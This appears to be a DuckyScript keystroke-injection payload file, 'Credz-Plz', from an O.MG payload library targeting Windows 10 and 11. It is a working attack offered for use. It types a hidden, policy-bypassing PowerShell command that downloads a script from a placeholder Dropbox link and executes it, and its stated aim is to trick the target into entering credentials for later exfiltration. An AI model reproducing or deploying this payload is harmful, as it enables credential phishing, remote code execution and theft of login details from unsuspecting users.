omg-payloads/payloads/library/credentials/-OMG-Credz-Plz/Credz-Plz-Execute.txt

16 lines
610 B
Plaintext

REM Title: Credz-Plz
REM Author: I am Jakoby
REM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details.
REM Target: Windows 10, 11
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly